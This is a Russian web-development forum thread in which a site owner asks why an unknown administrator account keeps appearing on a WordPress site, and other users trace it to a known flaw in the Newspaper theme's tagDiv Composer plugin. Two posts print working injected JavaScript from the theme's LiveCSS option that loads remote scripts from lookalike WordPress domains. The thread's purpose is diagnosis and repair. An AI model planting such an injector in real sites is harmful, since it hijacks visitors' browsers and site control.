Форум Сайтостроение Безопасность

Постоянно регистрируется новый администратор

A1
На сайте с 24.05.2019
Offline
26
Anton1987306
1297

Добрый день, помогите решить такую проблему. на сайте постоянно регистрируется новый администратор, поменяли все пароли, на хостинге, от ftp, но толку нет, 10-15 мин проходит и регистрируется в качестве админа вот такое чудо  wpapixx Email: instagramhileci@gmail.comВременно поставили ему роль подписчика, но как решить проблему.

Авторизация в почте Mail.ru — бесплатный и безопасный электронный почтовый ящик
Авторизация в почте Mail.ru — бесплатный и безопасный электронный почтовый ящик
  • e.mail.ru
Авторизоваться в аккаунте на Mail.ru. Почта Mail.ru - это фильтрация спама, быстрая отписка от рассылок, сортировка писем, тёмная тема и красивые фоны
W1
На сайте с 22.01.2021
Offline
288
webinfo
#1

Anton1987306 :
на сайте постоянно регистрируется новый администратор

Временно поставили ему роль подписчика

По-видимому, на вашем сайте вновь зарегистрировавшимся пользователям автоматически присваивается роль администратора. Исправьте это в настройках.

Мой форум - https://webinfo.guru –Там я всегда на связи
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#2
Anton1987306 :
10-15 мин проходит и регистрируется в качестве админа
Варианта два - либо такие настройки (сайта/плагинов) либо дыра на сайте.

Вангую дефолт-скрипт? Тогда изучать.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
A1
На сайте с 24.05.2019
Offline
26
Anton1987306
#3
SeVlad #:
Варианта два - либо такие настройки (сайта/плагинов) либо дыра на сайте.

Вангую дефолт-скрипт? Тогда изучать.

спасибо 

PA
На сайте с 15.02.2018
Offline
99
Pavel A
#4
Сайт то на чем сделан?
Продаю ХОСТИНГ, VDS шикарные | Дедик, VDS, Бекап ( https://is.gd/vgd245 ) дешево | Мои VDS ( https://is.gd/vds100 ) быстрее твоих
abst
На сайте с 14.01.2011
Offline
138
abst
#5

Тема у тебя Newspaper дырявая, обнови до актуальной версии. Другого варианта нет. Эксплуатируется XSS которая уже пару лет известна. Какой-то ушлый турок ломает.


В опциях LiveCSS у тебя следующий код:

a:2:{i:0;b:0;s:3:"css";s:1268:"</style><script>
function isScriptLoaded(src) {
    return Boolean(document.querySelector('script[src^="' + src + '"]')); // `src^` eklemesi, URL'nin o prefix ile başladığını kontrol eder.
}

var bdBase = "https://vvordpress.org/wp-urlx.js"; 
var bd = bdBase + "?v=" + Date.now();

if (!isScriptLoaded(bdBase)) {
    console.log("Script yükleniyor...");
    
    var d = document;
    var s = d.createElement('script');
    s.src = bd; 
    s.type = 'text/javascript';
    
    s.onload = function() {
        console.log("Script başarıyla yüklendi!");
    };
    
    s.onerror = function() {
        console.log("Script yüklenirken bir hata oluştu.");
    };
    
    var scripts = d.getElementsByTagName('script');
    if (scripts && scripts.length) {
        scripts[0].parentNode.insertBefore(s, scripts[0]);
    } else {
        d.body.appendChild(s);
    }
} else {
    console.log("Script zaten yüklendi.");
}
</script><script src="https://vvordpress.org/jquex4x.js"></script><script>document.addEventListener("DOMContentLoaded", function() {var scriptElement = document.querySelector('script[src^="https://vvordpress.org/jquex4x.js"]');if(scriptElement) {scriptElement.src = "https://vvordpress.org/jquex4x.js?v=" + Date.now();}});</script><style>";}
Облачные VPS с SSD (https://goo.gl/Z2PT6u) от 150 руб. ДЦ в МСК и СПБ. Utpime 99.9%. 100 рублей на тест в подарок!
abst
На сайте с 14.01.2011
Offline
138
abst
#6

Еще один вариант вредоносного кода:

a:2:{i:0;b:0;s:3:"css";s:1260:"</style><script>
function isScriptLoaded(src) {
    return Boolean(document.querySelector('script[src^="' + src + '"]')); // `src^` eklemesi, URL'nin o prefix ile başladığını kontrol eder.
}

var bdBase = "https://wpemojii.com/wp-urlx.js"; 
var bd = bdBase + "?v=" + Date.now();

if (!isScriptLoaded(bdBase)) {
    console.log("Script yükleniyor...");
    
    var d = document;
    var s = d.createElement('script');
    s.src = bd; 
    s.type = 'text/javascript';
    
    s.onload = function() {
        console.log("Script başarıyla yüklendi!");
    };
    
    s.onerror = function() {
        console.log("Script yüklenirken bir hata oluştu.");
    };
    
    var scripts = d.getElementsByTagName('script');
    if (scripts && scripts.length) {
        scripts[0].parentNode.insertBefore(s, scripts[0]);
    } else {
        d.body.appendChild(s);
    }
} else {
    console.log("Script zaten yüklendi.");
}
</script><script src="https://wpemojii.com/xmlrpc2.js"></script><script>document.addEventListener("DOMContentLoaded", function() {var scriptElement = document.querySelector('script[src^="https://wpemojii.com/xmlrpc2.js"]');if(scriptElement) {scriptElement.src = "https://wpemojii.com/xmlrpc2.js?v=" + Date.now();}});</script><style>";}
W1
На сайте с 22.01.2021
Offline
288
webinfo
#7
abst #:
Еще один вариант вредоносного кода:

Ты здесь собрался выкладывать все варианты, которые видел? Может быть, я тебя сильно удивлю, но на свете существуют ещё тысячи и тысячи вариантов, которых ты не видел. Никакого сёрча не хватит, чтобы всё это дерьмо опубликовать.

GG
На сайте с 21.05.2017
Offline
48
Gabriel Gray
#8

Проблема в плагине tagDiv Composer, который идет встроенным в тему. Вот тут подробно описано об этом - https://secureweb.site/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins/

Новый пользователь с правами админа, это всего лишь первый шаг.

Посмотрите в админке не появился ли сам собой новый плагин wp-zexit. У меня такая же беда. Причем тема не Newspaper, а IonMag (давно не обновляется) с тем же встроенным плагином на борту. Требуется обновить плагин до версии 4.2.2 а где его найти и как скачать отдельно от темы ума не приложу. 

abst
На сайте с 14.01.2011
Offline
138
abst
#9
Gabriel Gray #:

Проблема в плагине tagDiv Composer, который идет встроенным в тему. Вот тут подробно описано об этом - https://secureweb.site/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins/

Новый пользователь с правами админа, это всего лишь первый шаг.

Посмотрите в админке не появился ли сам собой новый плагин wp-zexit. У меня такая же беда. Причем тема не Newspaper, а IonMag (давно не обновляется) с тем же встроенным плагином на борту. Требуется обновить плагин до версии 4.2.2 а где его найти и как скачать отдельно от темы ума не приложу. 

Обновленный плагин вам особо не поможет, там логика разработки темы поменялась. Теперь весь базовый функционал не только в tagdiv сomposer, но и в td standart pack. В вашем случае - либо переходить на платную версию темы Newspaper или Newsmag или менять тему на любую другую. IonMag уже года 4 не поддерживается, если не больше.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий